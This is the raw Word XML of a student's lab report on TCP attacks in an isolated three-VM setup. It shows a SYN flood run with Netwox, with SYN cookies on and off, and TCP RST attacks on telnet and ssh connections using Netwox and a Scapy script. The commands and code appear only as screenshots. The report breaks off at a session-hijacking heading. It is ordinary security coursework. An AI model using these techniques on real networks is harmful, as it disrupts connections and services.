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49A18B" w14:textId="406F8F56" w:rsidR="00E736AF" w:rsidRDefault="00E736AF" w:rsidP="00E736AF">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk50833371"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ab</w:t>
      </w:r>
      <w:r>
        <w:t>4-report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079D944D" w14:textId="7D6B07DE" w:rsidR="00E736AF" w:rsidRDefault="00E736AF" w:rsidP="00E736AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>57117201王培丽</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E19BF25" w14:textId="5329C9A0" w:rsidR="00E736AF" w:rsidRDefault="00E736AF" w:rsidP="00E736AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0528F43E" w14:textId="0F2E9E55" w:rsidR="00A654F1" w:rsidRDefault="00A654F1" w:rsidP="00E736AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7CD203" w14:textId="4FC9DE41" w:rsidR="00A654F1" w:rsidRDefault="00A654F1" w:rsidP="00E736AF">
      <w:r w:rsidRPr="00A654F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位于同一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>局域网的3台虚拟机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E60452C" w14:textId="02C3322D" w:rsidR="00A654F1" w:rsidRDefault="00B43C02" w:rsidP="00E736AF">
      <w:r w:rsidRPr="00B43C02">
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidR="00E96082">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00A654F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB09B2" w14:textId="550C44E0" w:rsidR="00B43C02" w:rsidRDefault="00B43C02" w:rsidP="00E736AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43C02">
        <w:t>ictim</w:t>
      </w:r>
      <w:r w:rsidR="00E96082">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BABD34" w14:textId="70046EA4" w:rsidR="00A654F1" w:rsidRPr="00A654F1" w:rsidRDefault="00B43C02" w:rsidP="00E736AF">
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43C02">
        <w:t>bserver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00A654F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.0.2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C8ACD" w14:textId="28940A2F" w:rsidR="00FC0268" w:rsidRDefault="00FC0268" w:rsidP="00FC0268">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC0268">
        <w:t>Task1: SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0268">
        <w:t>Flooding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0268">
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ECC10B" w14:textId="3545D542" w:rsidR="00F6533A" w:rsidRDefault="00A067C5" w:rsidP="00F653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受害主机V被攻击前，查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00A067C5">
        <w:t>SYN cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态，</w:t>
      </w:r>
      <w:r w:rsidR="004B5227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先在开启的状态下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52576A97" w14:textId="0EF50CE3" w:rsidR="00FC0268" w:rsidRDefault="002C7828" w:rsidP="002C78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 w:rsidR="004B5227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V被攻击前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统队列大小，以及现在队列的使用情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5A6961" w14:textId="05322C28" w:rsidR="004751DD" w:rsidRPr="00614C84" w:rsidRDefault="00614C84" w:rsidP="004751DD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C402C3E" wp14:editId="0DFEDB5D">
            <wp:extent cx="5267325" cy="3914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091C" w14:textId="45A683C0" w:rsidR="00F14FFF" w:rsidRDefault="00F14FFF" w:rsidP="004751DD"/>
    <w:p w14:paraId="2019285B" w14:textId="77777777" w:rsidR="006162D4" w:rsidRDefault="006162D4" w:rsidP="004751DD"/>
    <w:p w14:paraId="31479242" w14:textId="30416D91" w:rsidR="002C7828" w:rsidRDefault="002C7828" w:rsidP="002C78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攻击者A对V发起SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flooding攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59151AA2" w14:textId="0B237AA7" w:rsidR="004558F0" w:rsidRDefault="004558F0" w:rsidP="004558F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（使用Netwox</w:t>
      </w:r>
      <w:r w:rsidR="00E050AE">
        <w:t xml:space="preserve"> 76</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D259CAA" w14:textId="002DE91A" w:rsidR="006162D4" w:rsidRDefault="00614C84" w:rsidP="00614C84">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26352BC3" wp14:editId="4B6681C7">
            <wp:extent cx="5267325" cy="2095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8560" w14:textId="77777777" w:rsidR="006162D4" w:rsidRDefault="006162D4" w:rsidP="00614C84"/>
    <w:p w14:paraId="532B2476" w14:textId="4AD147FA" w:rsidR="00F37C2D" w:rsidRDefault="00F37C2D" w:rsidP="00614C84">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Wireshark上可看到发送的数据包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C30CAC" w14:textId="2EE55D84" w:rsidR="00F37C2D" w:rsidRDefault="004558F0" w:rsidP="00614C84">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D433A26" wp14:editId="47DAC5DC">
            <wp:extent cx="5267325" cy="27622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ACE3" w14:textId="738F27F5" w:rsidR="002C7828" w:rsidRDefault="002C7828" w:rsidP="002C782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V被攻击后再次查看队列的使用情况：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FCC5CF" w14:textId="1191E486" w:rsidR="004B5227" w:rsidRDefault="00614C84" w:rsidP="004B5227">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24E63DDF" wp14:editId="60858270">
            <wp:extent cx="5276850" cy="20859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8"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="52768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89A22" w14:textId="778C8FDC" w:rsidR="00614C84" w:rsidRDefault="00827D5A" w:rsidP="004B5227">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现没有建立半连接，因为SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie的保护机制：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6677DC23" w14:textId="221D4285" w:rsidR="00827D5A" w:rsidRDefault="00827D5A" w:rsidP="004B5227">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当服务器收到SYN包时，会计算其消息摘要，用于cookie的计算，将其作为要返回的SYN</w:t>
      </w:r>
      <w:r w:rsidR="007F3FDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　ACK包的序列号Ｈ，只有当客户端返回了Ｈ＋１序列号的ACK包时，才分配资源建立连接</w:t>
      </w:r>
      <w:r w:rsidR="00465FC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，否则就不会浪费资源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22901DE1" w14:textId="74ED1F67" w:rsidR="008703D5" w:rsidRDefault="00F6533A" w:rsidP="008703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关闭</w:t>
      </w:r>
      <w:r w:rsidR="002C7828">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V的SYN</w:t>
      </w:r>
      <w:r w:rsidR="002C7828">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C7828">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie，重复上述攻击过程</w:t>
      </w:r>
      <w:r w:rsidR="00000AF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="008703D5">
        <w:t>V被攻击前队列情况：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD703BA" w14:textId="7D59D4C1" w:rsidR="008703D5" w:rsidRDefault="00DE324F" w:rsidP="008703D5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20E40377" wp14:editId="003FB9EB">
            <wp:extent cx="5276850" cy="2438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B8E3" w14:textId="77777777" w:rsidR="008703D5" w:rsidRDefault="008703D5" w:rsidP="008703D5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A发起攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C20C68" w14:textId="2849F71B" w:rsidR="005F371D" w:rsidRDefault="005F371D" w:rsidP="008703D5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16A4AAEE" wp14:editId="581CF125">
            <wp:extent cx="5267325" cy="2095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D2A6" w14:textId="3899A13F" w:rsidR="008703D5" w:rsidRDefault="008703D5" w:rsidP="008703D5">
      <w:r>
        <w:t>Wireshark：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F81F5FC" w14:textId="26C6D5DF" w:rsidR="008703D5" w:rsidRDefault="005F371D" w:rsidP="008703D5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3507913F" wp14:editId="7E5BF16E">
            <wp:extent cx="5267325" cy="2647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5969" w14:textId="6697F196" w:rsidR="008703D5" w:rsidRDefault="008703D5" w:rsidP="008703D5">
      <w:r>
        <w:t>V被攻击后队列情况：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B23F82" w14:textId="6EE87B3F" w:rsidR="008703D5" w:rsidRDefault="00E3522C" w:rsidP="009A1108">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25384E1D" wp14:editId="18F98684">
            <wp:extent cx="5267325" cy="33432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E401" w14:textId="6F1D52B4" w:rsidR="00F6533A" w:rsidRDefault="00F6533A" w:rsidP="00F6533A"/>
    <w:p w14:paraId="5CA80443" w14:textId="1EC4F379" w:rsidR="004B5227" w:rsidRDefault="004B5227" w:rsidP="004B5227"/>
    <w:p w14:paraId="04BD2E58" w14:textId="68A7A116" w:rsidR="008703D5" w:rsidRDefault="008703D5" w:rsidP="004B5227"/>
    <w:p w14:paraId="01DBAEE6" w14:textId="77777777" w:rsidR="008703D5" w:rsidRDefault="008703D5" w:rsidP="004B5227"/>
    <w:p w14:paraId="01C5E1EF" w14:textId="09E8F9E6" w:rsidR="00FC0268" w:rsidRDefault="00FC0268" w:rsidP="00FC0268">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC0268">
        <w:lastRenderedPageBreak/>
        <w:t>Task2: TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0268">
        <w:t>RST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0268">
        <w:t>Attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0268">
        <w:t>on telnet and ssh Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C7A859" w14:textId="7CE867C7" w:rsidR="00FC0268" w:rsidRDefault="00B81CB6" w:rsidP="00B81CB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首先主机V</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10.0.2.5) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和主机O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (10.0.2.6) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立好了一个telnet连接（TCP）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE235D9" w14:textId="49D48795" w:rsidR="005B0A9E" w:rsidRDefault="00D81CC0" w:rsidP="005B0A9E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="520B5737" wp14:editId="0CB66A69">
            <wp:extent cx="5267325" cy="26670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8"/>
                    <a:stretch/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ADE57" w14:textId="48C843F3" w:rsidR="00B81CB6" w:rsidRDefault="009F4791" w:rsidP="00B81CB6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F32F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>【使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F32F8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00F32F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etwox】</w:t>
      </w:r>
      <w:r w:rsidR="00B81CB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者A对V和O之间的此连接发起攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313586BB" w14:textId="105A29B9" w:rsidR="005B0A9E" w:rsidRDefault="00D81CC0" w:rsidP="005B0A9E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="664D25F9" wp14:editId="294349DD">
            <wp:extent cx="5267325" cy="4572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18"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="52673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7CC1" w14:textId="008F2367" w:rsidR="00B81CB6" w:rsidRDefault="00B81CB6" w:rsidP="00B81CB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攻击成功，连接被破坏：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4DCFEE" w14:textId="3A84A824" w:rsidR="005B0A9E" w:rsidRDefault="00D81CC0" w:rsidP="005B0A9E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E6E3FF7" wp14:editId="1CFDA1C2">
            <wp:extent cx="5267325" cy="4191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59"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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2A60B" w14:textId="71481900" w:rsidR="005B0A9E" w:rsidRDefault="009F4791" w:rsidP="005B0A9E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F32F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>【使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F32F8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scapy</w:t>
      </w:r>
      <w:r w:rsidRPr="00F32F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V和O重新建立连接，攻击者A发起攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D94870" w14:textId="282CC599" w:rsidR="0005640C" w:rsidRDefault="0005640C" w:rsidP="00F6271D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先用Wireshark获得序列号，</w:t>
      </w:r>
      <w:r w:rsidR="00F6271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由下图</w:t>
      </w:r>
      <w:r w:rsidR="00D66124">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(攻击后的截图)</w:t>
      </w:r>
      <w:r w:rsidR="00F6271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F32F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidR="00F32F8D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F32F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>seq=</w:t>
      </w:r>
      <w:r w:rsidR="00D66124">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>330882586</w:t>
      </w:r>
      <w:r w:rsidR="00F32F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，dport=40512</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA233D5" w14:textId="7323BF44" w:rsidR="0005640C" w:rsidRDefault="00D66124" w:rsidP="005B0A9E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39A93C47" wp14:editId="75C77BC1">
            <wp:extent cx="5715000" cy="32670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" t="15473" b="9456"/>
                    <a:stretch/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D3FF" w14:textId="62436AE3" w:rsidR="00D66124" w:rsidRDefault="00D66124" w:rsidP="00CF2C95">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>对应</w:t>
      </w:r>
      <w:r w:rsidR="00CF2C95">
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:t>tcpRST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y：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018CD98" w14:textId="72CD5139" w:rsidR="00D66124" w:rsidRDefault="00D66124" w:rsidP="00CF2C9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BAC2A51" wp14:editId="2460013F">
            <wp:extent cx="5276850" cy="14954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3"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276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220EA" w14:textId="165D7218" w:rsidR="00FC41F8" w:rsidRDefault="001A4872" w:rsidP="00FC41F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 w:rsidR="00D66124">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行代码进行</w:t>
      </w:r>
      <w:r w:rsidR="005B0A9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F5B3E" w14:textId="779A854A" w:rsidR="00FC41F8" w:rsidRDefault="00D66124" w:rsidP="00FC41F8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68EF20F5" wp14:editId="5F6C30DE">
            <wp:extent cx="5267325" cy="28670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7"/>
                    <a:stretch/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862E9" w14:textId="437D7441" w:rsidR="00D66124" w:rsidRDefault="00D66124" w:rsidP="00FC41F8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击成功，连接被断开，Wireshark对应见上一页截图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A52ED5B" w14:textId="7B53551D" w:rsidR="00A57520" w:rsidRDefault="00D66124" w:rsidP="00FC41F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00D17EDE" wp14:editId="423C67BF">
            <wp:extent cx="4905375" cy="3238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871" b="34922"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="49053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9797" w14:textId="39A14CAE" w:rsidR="00FC41F8" w:rsidRDefault="00EE2F30" w:rsidP="00FC41F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对于</w:t>
      </w:r>
      <w:r w:rsidR="00FC41F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssh连接，进行攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26755414" w14:textId="7AF64996" w:rsidR="005B0A9E" w:rsidRDefault="004974C2" w:rsidP="005B0A9E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样，</w:t>
      </w:r>
      <w:r w:rsidR="00A57520">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先获取序列号</w:t>
      </w:r>
      <w:r w:rsidR="00B157D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>seq=</w:t>
      </w:r>
      <w:r w:rsidR="00B157D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B157D1">
        <w:t>346015354</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，sport=22，dport=44056</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0E4CA3" w14:textId="02D93ED3" w:rsidR="00A57520" w:rsidRDefault="00A57520" w:rsidP="005B0A9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7977BAA6" wp14:editId="58750DDD">
            <wp:extent cx="5848350" cy="28479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7" b="10191"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="58483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31523" w14:textId="032F5B61" w:rsidR="00BF374E" w:rsidRDefault="00B157D1" w:rsidP="005B0A9E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>修改代码对应位置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2727DEA0" w14:textId="687D32F8" w:rsidR="00B157D1" w:rsidRPr="0005640C" w:rsidRDefault="00B157D1" w:rsidP="005B0A9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A1630DA" wp14:editId="3D98FF86">
            <wp:extent cx="5267325" cy="18002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717E" w14:textId="0FFA4520" w:rsidR="00BF374E" w:rsidRDefault="00FD68A0" w:rsidP="005B0A9E">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00B157D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE29F30" w14:textId="40325E28" w:rsidR="00B157D1" w:rsidRDefault="00B157D1" w:rsidP="005B0A9E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="126848AF" wp14:editId="54B1B2AE">
            <wp:extent cx="5267325" cy="32861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0CFB" w14:textId="1BCCD129" w:rsidR="00B157D1" w:rsidRDefault="00B157D1" w:rsidP="005B0A9E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击成功，ssh连接被切断：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80D615" w14:textId="29E5DA58" w:rsidR="00B157D1" w:rsidRDefault="00B157D1" w:rsidP="005B0A9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D5A458A" wp14:editId="0E13A95E">
            <wp:extent cx="5267325" cy="28384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9"/>
                    <a:stretch/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FF793" w14:textId="4B02542D" w:rsidR="002F2A3F" w:rsidRDefault="00FC0268" w:rsidP="00665726">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC0268">
        <w:lastRenderedPageBreak/>
        <w:t>Task4: TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0268">
        <w:t>Session</w:t>
      </w:r>
      <w:r>
